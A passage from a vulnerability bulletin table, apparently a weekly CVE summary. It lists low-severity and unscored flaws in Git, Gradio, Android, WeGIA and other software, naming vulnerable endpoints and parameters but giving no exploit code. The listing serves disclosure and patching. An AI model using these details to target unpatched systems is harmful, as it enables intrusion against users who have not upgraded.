| n/a--Intel(R) Neural Compressor software |
Time-of-check time-of-use race condition in some Intel(R) Neural Compressor software before version v3.0 may allow an authenticated user to potentially enable information disclosure via adjacent access. | 2025-01-16 | 2.6 | CVE-2024-37181 |
| notaryproject--notation-go |
notion-go is a collection of libraries for supporting sign and verify OCI artifacts. Based on Notary Project specifications. The issue was identified during Quarkslab's security audit on the Certificate Revocation List (CRL) based revocation check feature. After retrieving the CRL, notation-go attempts to update the CRL cache using the os.Rename method. However, this operation may fail due to operating system-specific limitations, particularly when the source and destination paths are on different mount points. This failure could lead to an unexpected program termination. In method `crl.(*FileCache).Set`, a temporary file is created in the OS dedicated area (like /tmp for, usually, Linux/Unix). The file is written and then it is tried to move it to the dedicated `notation` cache directory thanks `os.Rename`. As specified in Go documentation, OS specific restriction may apply. When used with Linux OS, it is relying on rename syscall from the libc and as per the documentation, moving a file to a different mountpoint raises an EXDEV error, interpreted as Cross device link not permitted error. Some Linux distribution, like RedHat use a dedicated filesystem (tmpfs), mounted on a specific mountpoint (usually /tmp) for temporary files. When using such OS, revocation check based on CRL will repeatedly crash notation. As a result the signature verification process is aborted as process crashes. This issue has been addressed in version 1.3.0-rc.2 and all users are advised to upgrade. There are no known workarounds for this vulnerability. | 2025-01-13 | 3.3 | CVE-2024-51491 |
| OpenVPN--ovpn-dco |
OpenVPN ovpn-dco for Windows version 1.1.1 allows an unprivileged local attacker to send I/O control messages with invalid data to the driver resulting in a NULL pointer dereference leading to a system halt. | 2025-01-15 | 3.3 | CVE-2024-5198 |
| Ossur--Mobile Logic Application |
Multiple bash files were present in the application's private directory. Bash files can be used on their own, by an attacker that has already full access to the mobile platform to compromise the translations for the application. | 2025-01-17 | 3.5 | CVE-2024-54681 |
| phiewer -- phiewer |
In Phiewer 4.1.0, a dylib injection leads to Command Execution which allow attackers to inject dylib file potentially leading to remote control and unauthorized access to sensitive user data. | 2025-01-15 | 3.3 | CVE-2024-53407 |
| Phoenix--SecureCore for Intel Kaby Lake |
Improper Check for Unusual or Exceptional Conditions vulnerability in Phoenix SecureCoreâ„¢ for Intel Kaby Lake, Phoenix SecureCoreâ„¢ for Intel Coffee Lake, Phoenix SecureCoreâ„¢ for Intel Comet Lake, Phoenix SecureCoreâ„¢ for Intel Ice Lake allows Input Data Manipulation.This issue affects SecureCoreâ„¢ for Intel Kaby Lake: before 4.0.1.1012; SecureCoreâ„¢ for Intel Coffee Lake: before 4.1.0.568; SecureCoreâ„¢ for Intel Comet Lake: before 4.2.1.292; SecureCoreâ„¢ for Intel Ice Lake: before 4.2.0.334. | 2025-01-14 | 2.3 | CVE-2024-29979 |
| Phoenix--SecureCore for Intel Kaby Lake |
Improper Check for Unusual or Exceptional Conditions vulnerability in Phoenix SecureCoreâ„¢ for Intel Kaby Lake, Phoenix SecureCoreâ„¢ for Intel Coffee Lake, Phoenix SecureCoreâ„¢ for Intel Comet Lake, Phoenix SecureCoreâ„¢ for Intel Ice Lake allows Input Data Manipulation.This issue affects SecureCoreâ„¢ for Intel Kaby Lake: before 4.0.1.1012; SecureCoreâ„¢ for Intel Coffee Lake: before 4.1.0.568; SecureCoreâ„¢ for Intel Comet Lake: before 4.2.1.292; SecureCoreâ„¢ for Intel Ice Lake: before 4.2.0.334. | 2025-01-14 | 2.3 | CVE-2024-29980 |
| SourceCodester--Task Reminder System |
A vulnerability was found in SourceCodester Task Reminder System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the component Maintenance Section. The manipulation of the argument System Name leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-01-14 | 2.4 | CVE-2025-0464 |
| termius -- termius |
An issue in termius before v.9.9.0 allows a local attacker to execute arbitrary code via a crafted script to the DYLD_INSERT_LIBRARIES component. | 2025-01-15 | 3.3 | CVE-2024-55503 |
| TYPO3--typo3 |
TYPO3 is a free and open source Content Management Framework. It has been discovered that the install tool password has been logged as plaintext in case the password hashing mechanism used for the password was incorrect. Users are advised to update to TYPO3 versions 13.4.3 ELTS which fixes the problem described. There are no known workarounds for this vulnerability. | 2025-01-14 | 3.1 | CVE-2024-55891 |
| Union Bank of India--Vyom |
A vulnerability has been found in Union Bank of India Vyom 8.0.34 on Android and classified as problematic. This vulnerability affects unknown code of the component Rooting Detection. The manipulation leads to protection mechanism failure. The attack needs to be approached locally. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-01-19 | 3.9 | CVE-2025-0575 |
Severity Not Yet Assigned
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|
| aws--aws-cdk |
The AWS Cloud Development Kit (AWS CDK) is an open-source software development framework to define cloud infrastructure in code and provision it through AWS CloudFormation. Users who use IAM OIDC custom resource provider package will download CA Thumbprints as part of the custom resource workflow. However, the current `tls.connect` method will always set `rejectUnauthorized: false` which is a potential security concern. CDK should follow the best practice and set `rejectUnauthorized: true`. However, this could be a breaking change for existing CDK applications and we should fix this with a feature flag. Note that this is marked as low severity Security advisory because the issuer url is provided by CDK users who define the CDK application. If they insist on connecting to a unauthorized OIDC provider, CDK should not disallow this. Additionally, the code block is run in a Lambda environment which mitigate the MITM attack. The patch is in progress. To mitigate, upgrade to CDK v2.177.0 (Expected release date 2025-02-22). Once upgraded, users should make sure the feature flag '@aws-cdk/aws-iam:oidcRejectUnauthorizedConnections' is set to true in `cdk.context.json` or `cdk.json`. There are no known workarounds for this vulnerability. | 2025-01-17 | not yet calculated | CVE-2025-23206 |
| Bitdefender--Antivirus Free 2020 |
An untrusted search path vulnerability in testinitsigs.exe as used in Bitdefender Antivirus Free 2020 allows a low-privilege attacker to execute code as SYSTEM via a specially crafted DLL file. | 2025-01-15 | not yet calculated | CVE-2020-8094 |
| Bitdefender--Virus Scanner |
A vulnerability in the BitdefenderVirusScanner binary as used in Bitdefender Virus Scanner for MacOS may allow .dynamic library injection (DYLD injection) without being blocked by AppleMobileFileIntegrity (AMFI). This issue is caused by the absence of Hardened Runtime or Library Validation signing. This issue affects Bitdefender Virus Scanner versions before 3.18. | 2025-01-13 | not yet calculated | CVE-2024-11128 |
| codidact--qpixel |
@codidact/qpixel is a Q&A-based community knowledge-sharing software. In affected versions when a category is set to private or limited-visibility within QPixel's admin tools, suggested edits within this category can still be viewed by unprivileged or anonymous users via the suggested edit queue. This issue has not yet been patched and no workarounds are available. Users are advised to follow the development repo for updates. ### Patches Not yet patched. ### Workarounds None available. Private or limited-visibility categories should not be considered ways to store sensitive information. ### References Internal: [SUPPORT-114](https://codidact.atlassian.net/issues/SUPPORT-114) | 2025-01-13 | not yet calculated | CVE-2025-22138 |
| CrafterCMS--CrafterCMS |
Transmission of Private Resources into a New Sphere ('Resource Leak') vulnerability in CrafterCMS Engine on Linux, MacOS, x86, Windows, 64 bit, ARM allows Directory Indexing, Resource Leak Exposure.This issue affects CrafterCMS: from 4.0.0 before 4.0.8, from 4.1.0 before 4.1.6. | 2025-01-15 | not yet calculated | CVE-2025-0502 |
| devycreates--Bible-Module |
Bible Module is a tool designed for ROBLOX developers to integrate Bible functionality into their games. The `FetchVerse` and `FetchPassage` functions in the Bible Module are susceptible to injection attacks due to the absence of input validation. This vulnerability could allow an attacker to manipulate the API request URLs, potentially leading to unauthorized access or data tampering. This issue has been addressed in version 0.0.3. All users are advised to upgrade. There are no known workarounds for this vulnerability. | 2025-01-17 | not yet calculated | CVE-2025-23202 |
| exelban--stats |
stats is a macOS system monitor in for the menu bar. The Stats application is vulnerable to a local privilege escalation due to the insecure implementation of its XPC service. The application registers a Mach service under the name `eu.exelban.Stats.SMC.Helper`. The associated binary, eu.exelban.Stats.SMC.Helper, is a privileged helper tool designed to execute actions requiring elevated privileges on behalf of the client, such as setting fan modes, adjusting fan speeds, and executing the `powermetrics` command. The root cause of this vulnerability lies in the `shouldAcceptNewConnection` method, which unconditionally returns YES (or true), allowing any XPC client to connect to the service without any form of verification. As a result, unauthorized clients can establish a connection to the Mach service and invoke methods exposed by the HelperTool interface. An attacker can exploit this vulnerability to modify the hardware settings of the user's device and execute arbitrary code with root privileges. This issue has been addressed in version 2.11.21 and all users are advised to upgrade. There are no known workarounds for this vulnerability. | 2025-01-17 | not yet calculated | CVE-2025-21606 |
| FFmpeg--FFmpeg |
Unchecked Return Value, Out-of-bounds Read vulnerability in FFmpeg allows Read Sensitive Constants Within an Executable. This vulnerability is associated with program files https://github.Com/FFmpeg/FFmpeg/blob/master/libavfilter/af_pan.C . This issue affects FFmpeg: 7.1. Issue was fixed: https://github.com/FFmpeg/FFmpeg/commit/b5b6391d64807578ab872dc58fb8aa621dcfc38a https://github.com/FFmpeg/FFmpeg/commit/b5b6391d64807578ab872dc58fb8aa621dcfc38a This issue was discovered by: Simcha Kosman | 2025-01-16 | not yet calculated | CVE-2025-0518 |
| git--git |
Git is a fast, scalable, distributed revision control system with an unusually rich command set that provides both high-level operations and full access to internals. When Git asks for credentials via a terminal prompt (i.e. without using any credential helper), it prints out the host name for which the user is expected to provide a username and/or a password. At this stage, any URL-encoded parts have been decoded already, and are printed verbatim. This allows attackers to craft URLs that contain ANSI escape sequences that the terminal interpret to confuse users e.g. into providing passwords for trusted Git hosting sites when in fact they are then sent to untrusted sites that are under the attacker's control. This issue has been patch via commits `7725b81` and `c903985` which are included in release versions v2.48.1, v2.47.1, v2.46.3, v2.45.3, v2.44.3, v2.43.6, v2.42.4, v2.41.3, and v2.40.4. Users are advised to upgrade. Users unable to upgrade should avoid cloning from untrusted URLs, especially recursive clones. | 2025-01-14 | not yet calculated | CVE-2024-50349 |
| git--git |
Git is a source code management tool. When cloning from a server (or fetching, or pushing), informational or error messages are transported from the remote Git process to the client via the so-called "sideband channel". These messages will be prefixed with "remote:" and printed directly to the standard error output. Typically, this standard error output is connected to a terminal that understands ANSI escape sequences, which Git did not protect against. Most modern terminals support control sequences that can be used by a malicious actor to hide and misrepresent information, or to mislead the user into executing untrusted scripts. As requested on the git-security mailing list, the patches are under discussion on the public mailing list. Users are advised to update as soon as possible. Users unable to upgrade should avoid recursive clones unless they are from trusted sources. | 2025-01-15 | not yet calculated | CVE-2024-52005 |
| git--git |
Git is a fast, scalable, distributed revision control system with an unusually rich command set that provides both high-level operations and full access to internals. Git defines a line-based protocol that is used to exchange information between Git and Git credential helpers. Some ecosystems (most notably, .NET and node.js) interpret single Carriage Return characters as newlines, which renders the protections against CVE-2020-5260 incomplete for credential helpers that treat Carriage Returns in this way. This issue has been addressed in commit `b01b9b8` which is included in release versions v2.48.1, v2.47.1, v2.46.3, v2.45.3, v2.44.3, v2.43.6, v2.42.4, v2.41.3, and v2.40.4. Users are advised to upgrade. Users unable to upgrade should avoid cloning from untrusted URLs, especially recursive clones. | 2025-01-14 | not yet calculated | CVE-2024-52006 |
| git-lfs--git-lfs |
Git LFS is a Git extension for versioning large files. When Git LFS requests credentials from Git for a remote host, it passes portions of the host's URL to the `git-credential(1)` command without checking for embedded line-ending control characters, and then sends any credentials it receives back from the Git credential helper to the remote host. By inserting URL-encoded control characters such as line feed (LF) or carriage return (CR) characters into the URL, an attacker may be able to retrieve a user's Git credentials. This problem exists in all previous versions and is patched in v3.6.1. All users should upgrade to v3.6.1. There are no workarounds known at this time. | 2025-01-14 | not yet calculated | CVE-2024-53263 |
| Google--Android |
In endCallForSubscriber of PhoneInterfaceManager.java, there is a possible way to prevent access to emergency services due to a logic error in the code. This could lead to a local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-01-17 | not yet calculated | CVE-2017-13322 |
| Google--Android |
In multiple functions of UserDictionaryProvider.java, there is a possible way to add and delete words in the user dictionary due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-01-17 | not yet calculated | CVE-2018-9375 |
| Google--Android |
In multiple functions of MiniThumbFile.java, there is a possible way to view the thumbnails of deleted photos due to a confused deputy. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-01-17 | not yet calculated | CVE-2018-9379 |
| Google--Android |
In multiple functions of WifiServiceImpl.java, there is a possible way to activate Wi-Fi hotspot from a non-owner profile due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-01-17 | not yet calculated | CVE-2018-9382 |
| Google--Android |
In asn1_ber_decoder of asn1_decoder.c, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. | 2025-01-17 | not yet calculated | CVE-2018-9383 |
| Google--Android |
In multiple locations, there is a possible way to bypass KASLR due to an unusual root cause. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. | 2025-01-17 | not yet calculated | CVE-2018-9384 |
| Google--Android |
In multiple functions of mnh-sm.c, there is a possible way to trigger a heap overflow due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-01-18 | not yet calculated | CVE-2018-9387 |
| Google--Android |
In ip6_append_data of ip6_output.c, there is a possible way to achieve code execution due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-01-18 | not yet calculated | CVE-2018-9389 |
| Google--Android |
In many locations, there is a possible way to access kernel memory in user space due to an incorrect bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-01-18 | not yet calculated | CVE-2018-9401 |
| Google--Android |
In BnDmAgent::onTransact of dm_agent.cpp, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. | 2025-01-18 | not yet calculated | CVE-2018-9405 |
| Google--Android |
In NlpService, there is a possible way to obtain location information due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-01-18 | not yet calculated | CVE-2018-9406 |
| Google--Android |
In multiple functions of Parcel.cpp, there is a possible way to bypass address space layout randomization. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-01-17 | not yet calculated | CVE-2018-9434 |
| Google--Android |
In onCreate of EmergencyCallbackModeExitDialog.java, there is a possible way to crash the emergency callback mode due to a missing null check. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-01-17 | not yet calculated | CVE-2018-9447 |
| Google--Android |
In onAttachFragment of ShareIntentActivity.java, there is a possible way for an app to read files in the messages app due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-01-18 | not yet calculated | CVE-2018-9461 |
| Google--Android |
In multiple locations, there is a possible way to read protected files due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-01-18 | not yet calculated | CVE-2018-9464 |
| gradio-app--gradio |
Gradio is an open-source Python package that allows quick building of demos and web application for machine learning models, API, or any arbitrary Python function. Gradio's Access Control List (ACL) for file paths can be bypassed by altering the letter case of a blocked file or directory path. This vulnerability arises due to the lack of case normalization in the file path validation logic. On case-insensitive file systems, such as those used by Windows and macOS, this flaw enables attackers to circumvent security restrictions and access sensitive files that should be protected. This issue can lead to unauthorized data access, exposing sensitive information and undermining the integrity of Gradio's security model. Given Gradio's popularity for building web applications, particularly in machine learning and AI, this vulnerability may pose a substantial threat if exploited in production environments. This issue has been addressed in release version 5.6.0. Users are advised to upgrade. There are no known workarounds for this vulnerability. | 2025-01-14 | not yet calculated | CVE-2025-23042 |
| haydenbleasel--next-forge |
next-forge is a Next.js project boilerplate for modern web application. The BASEHUB_TOKEN commited in apps/web/.env.example. Users should avoid use of this token and should remove any access it may have in their systems. | 2025-01-13 | not yet calculated | CVE-2025-23027 |
| Imagination Technologies--Graphics DDK |
Kernel software installed and running inside a Guest VM may post improper commands to the GPU Firmware to write data outside the Guest's virtualised GPU memory. | 2025-01-13 | not yet calculated | CVE-2024-52936 |
| jupyter--nbgrader |
nbgrader is a system for assigning and grading notebooks. Enabling frame-ancestors: 'self' grants any JupyterHub user the ability to extract formgrader content by sending malicious links to users with access to formgrader, at least when using the default JupyterHub configuration of `enable_subdomains = False`. #1915 disables a protection which would allow user Alice to craft a page embedding formgrader in an IFrame. If Bob visits that page, his credentials will be sent and the formgrader page loaded. Because Alice's page is on the same Origin as the formgrader iframe, Javasript on Alice's page has _full access_ to the contents of the page served by formgrader using Bob's credentials. This issue has been addressed in release 0.9.5 and all users are advised to upgrade. Users unable to upgrade may disable `frame-ancestors: self`, or enable per-user and per-service subdomains with `JupyterHub.enable_subdomains = True` (then even if embedding in an IFrame is allowed, the host page does not have access to the contents of the frame). | 2025-01-17 | not yet calculated | CVE-2025-23205 |
| LabRedesCefetRJ--WeGIA |
WeGIA is an open source web manager with a focus on the Portuguese language and charitable institutions. A Stored Cross-Site Scripting (XSS) vulnerability was identified in the `informacao_adicional.php` endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the `descricao` parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk. The application fails to properly validate and sanitize user inputs in the `informacao_adicional.php` parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system. This issue has been addressed in version 3.2.6 and all users are advised to upgrade. There are no known workarounds for this vulnerability. | 2025-01-13 | not yet calculated | CVE-2025-22613 |
| LabRedesCefetRJ--WeGIA |
WeGIA is an open source web manager with a focus on the Portuguese language and charitable institutions. A Stored Cross-Site Scripting (XSS) vulnerability was identified in the `dependente_editarInfoPessoal.php` endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the `nome` and `SobrenomeForm`parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk. The application fails to properly validate and sanitize user inputs in the `dependente_editarInfoPessoal.php` parameters. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system. This issue has been addressed in version 3.2.6 and all users are advised to upgrade. There are no known workarounds for this vulnerability. | 2025-01-13 | not yet calculated | CVE-2025-22614 |
| LabRedesCefetRJ--WeGIA |
WeGIA is an open source web manager with a focus on the Portuguese language and charitable institutions. A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the `Cadastro_Atendido.php` endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the `cpf` parameter. The application fails to validate and sanitize user inputs in the `cpf` parameter. This lack of validation permits the injection of malicious payloads, which are reflected back to the user's browser in the server's response and executed within the context of the victim's browser. This issue has been addressed in version 3.2.6 and all users are advised to upgrade. There are no known workarounds for this vulnerability. | 2025-01-13 | not yet calculated | CVE-2025-22615 |
| LabRedesCefetRJ--WeGIA |
WeGIA is an open source web manager with a focus on the Portuguese language and charitable institutions. A Stored Cross-Site Scripting (XSS) vulnerability was identified in the `dependente_parentesco_adicionar.php` endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the `descricao` parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk. The application fails to properly validate and sanitize user inputs in the `dependente_parentesco_adicionar.php` parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system. This issue has been addressed in version 3.2.6 and all users are advised to upgrade. There are no known workarounds for this vulnerability. | 2025-01-13 | not yet calculated | CVE-2025-22616 |
| LabRedesCefetRJ--WeGIA |
WeGIA is an open source web manager with a focus on the Portuguese language and charitable institutions. A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the `editar_socio.php` endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the `socio` parameter. The application fails to validate and sanitize user inputs in the `socio` parameter. This lack of validation permits the injection of malicious payloads, which are reflected back to the user's browser in the server's response and executed within the context of the victim's browser. This issue has been addressed in version 3.2.7 and all users are advised to upgrade. There are no known workarounds for this vulnerability. | 2025-01-13 | not yet calculated | CVE-2025-22617 |
| LabRedesCefetRJ--WeGIA |
WeGIA is an open source web manager with a focus on the Portuguese language and charitable institutions. A Stored Cross-Site Scripting (XSS) vulnerability was identified in the `adicionar_cargo.php` endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the `cargo` parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk. The application fails to properly validate and sanitize user inputs in the `adicionar_cargo.php` parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system. This issue has been addressed in release version 3.2.6 and all users are advised to upgrade. There are no known workarounds for this vulnerability. | 2025-01-13 | not yet calculated | CVE-2025-22618 |
| LabRedesCefetRJ--WeGIA |
WeGIA is an open source web manager with a focus on the Portuguese language and charitable institutions. A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the `editar_permissoes.php` endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the `msg_c` parameter. The application fails to validate and sanitize user inputs in the `msg_c` parameter. This lack of validation permits the injection of malicious payloads, which are reflected back to the user's browser in the server's response and executed within the context of the victim's browser. This issue has been addressed in release version 3.2.6. All users are advised to upgrade. There are no known workarounds for this vulnerability. | 2025-01-13 | not yet calculated | CVE-2025-22619 |
| LabRedesCefetRJ--WeGIA |
WeGIA is an open source web manager with a focus on the Portuguese language and charitable institutions. A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the `cadastro_funcionario.php` endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the `cpf` parameter. The application fails to validate and sanitize user inputs in the `cpf` parameter. This lack of validation permits the injection of malicious payloads, which are reflected back to the user's browser in the server's response and executed within the context of the victim's browser. This issue has been addressed in version 3.2.6. All users are advised to upgrade. There are no known workarounds for this vulnerability. | 2025-01-14 | not yet calculated | CVE-2025-23030 |
| LabRedesCefetRJ--WeGIA |
WeGIA is an open source web manager with a focus on the Portuguese language and charitable institutions. A Stored Cross-Site Scripting (XSS) vulnerability was identified in the `adicionar_alergia.php` endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the `nome` parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk. The application fails to properly validate and sanitize user inputs in the `adicionar_alergia.php` parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system. This issue has been addressed in version 3.2.6. All users are advised to upgrade. There are no known workarounds for this vulnerability. | 2025-01-14 | not yet calculated | CVE-2025-23031 |
| LabRedesCefetRJ--WeGIA |
WeGIA is an open source web manager with a focus on the Portuguese language and charitable institutions. A Stored Cross-Site Scripting (XSS) vulnerability was identified in the `adicionar_escala.php` endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the `escala` parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk. The application fails to properly validate and sanitize user inputs in the `adicionar_escala.php` parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system. This issue has been addressed in version 3.2.6. All users are advised to upgrade. There are no known workarounds for this vulnerability. | 2025-01-14 | not yet calculated | CVE-2025-23032 |
| LabRedesCefetRJ--WeGIA |
WeGIA is an open source web manager with a focus on the Portuguese language and charitable institutions. A Stored Cross-Site Scripting (XSS) vulnerability was identified in the `adicionar_situacao.php` endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the `situacao` parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk. The application fails to properly validate and sanitize user inputs in the `adicionar_situacao.php` parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system. This issue has been addressed in version 3.2.6. All users are advised to upgrade. There are no known workarounds for this vulnerability. | 2025-01-14 | not yet calculated | CVE-2025-23033 |
| LabRedesCefetRJ--WeGIA |
WeGIA is an open source web manager with a focus on the Portuguese language and charitable institutions. A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the `tags.php` endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the `msg_e` parameter. The application fails to validate and sanitize user inputs in the `msg_e` parameter. This lack of validation permits the injection of malicious payloads, which are reflected back to the user's browser in the server's response and executed within the context of the victim's browser. This issue has been addressed in version 3.2.6. All users are advised to upgrade. There are no known workarounds for this vulnerability. | 2025-01-14 | not yet calculated | CVE-2025-23034 |
| LabRedesCefetRJ--WeGIA |
WeGIA is an open source web manager with a focus on the Portuguese language and charitable institutions. A Stored Cross-Site Scripting (XSS) vulnerability was identified in the `adicionar_tipo_quadro_horario.php` endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the `tipo` parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk. The application fails to properly validate and sanitize user inputs in the `adicionar_tipo_quadro_horario.php` parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system. This issue has been addressed in version 3.2.6. All users are advised to upgrade. There are no known workarounds for this vulnerability. | 2025-01-14 | not yet calculated | CVE-2025-23035 |
| LabRedesCefetRJ--WeGIA |
WeGIA is an open source web manager with a focus on the Portuguese language and charitable institutions. A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the `pre_cadastro_funcionario.php` endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the `msg_e` parameter. The application fails to validate and sanitize user inputs in the `msg_e` parameter. This lack of validation permits the injection of malicious payloads, which are reflected back to the user's browser in the server's response and executed within the context of the victim's browser. This issue has been addressed in version 3.2.7. All users are advised to upgrade. There are no known workarounds for this vulnerability. | 2025-01-14 | not yet calculated | CVE-2025-23036 |
| LabRedesCefetRJ--WeGIA |
WeGIA is an open source web manager with a focus on the Portuguese language and charitable institutions. A Stored Cross-Site Scripting (XSS) vulnerability was identified in the `control.php` endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the `cargo` parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk. The application fails to properly validate and sanitize user inputs in the `control.php` parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system. This issue has been addressed in version 3.2.6. All users are advised to upgrade. There are no known workarounds for this vulnerability. | 2025-01-14 | not yet calculated | CVE-2025-23037 |
| LabRedesCefetRJ--WeGIA |
WeGIA is an open source web manager with a focus on the Portuguese language and charitable institutions. A Stored Cross-Site Scripting (XSS) vulnerability was identified in the `remuneracao.php` endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the `descricao` parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk. The application fails to properly validate and sanitize user inputs in the `remuneracao.php` parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system. This issue has been addressed in version 3.2.6. All users are advised to upgrade. There are no known workarounds for this vulnerability. | 2025-01-14 | not yet calculated | CVE-2025-23038 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: RDMA/rtrs: Ensure 'ib_sge list' is accessible Move the declaration of the 'ib_sge list' variable outside the 'always_invalidate' block to ensure it remains accessible for use throughout the function. Previously, 'ib_sge list' was declared within the 'always_invalidate' block, limiting its accessibility, then caused a 'BUG: kernel NULL pointer dereference'[1]. ? __die_body.cold+0x19/0x27 ? page_fault_oops+0x15a/0x2d0 ? search_module_extables+0x19/0x60 ? search_bpf_extables+0x5f/0x80 ? exc_page_fault+0x7e/0x180 ? asm_exc_page_fault+0x26/0x30 ? memcpy_orig+0xd5/0x140 rxe_mr_copy+0x1c3/0x200 [rdma_rxe] ? rxe_pool_get_index+0x4b/0x80 [rdma_rxe] copy_data+0xa5/0x230 [rdma_rxe] rxe_requester+0xd9b/0xf70 [rdma_rxe] ? finish_task_switch.isra.0+0x99/0x2e0 rxe_sender+0x13/0x40 [rdma_rxe] do_task+0x68/0x1e0 [rdma_rxe] process_one_work+0x177/0x330 worker_thread+0x252/0x390 ? __pfx_worker_thread+0x10/0x10 This change ensures the variable is available for subsequent operations that require it. [1] https://lore.kernel.org/linux-rdma/6a1f3e8f-deb0-49f9-bc69-a9b03ecfcda7@fujitsu.com/ | 2025-01-15 | not yet calculated | CVE-2024-36476 |
| Linux--Linux |
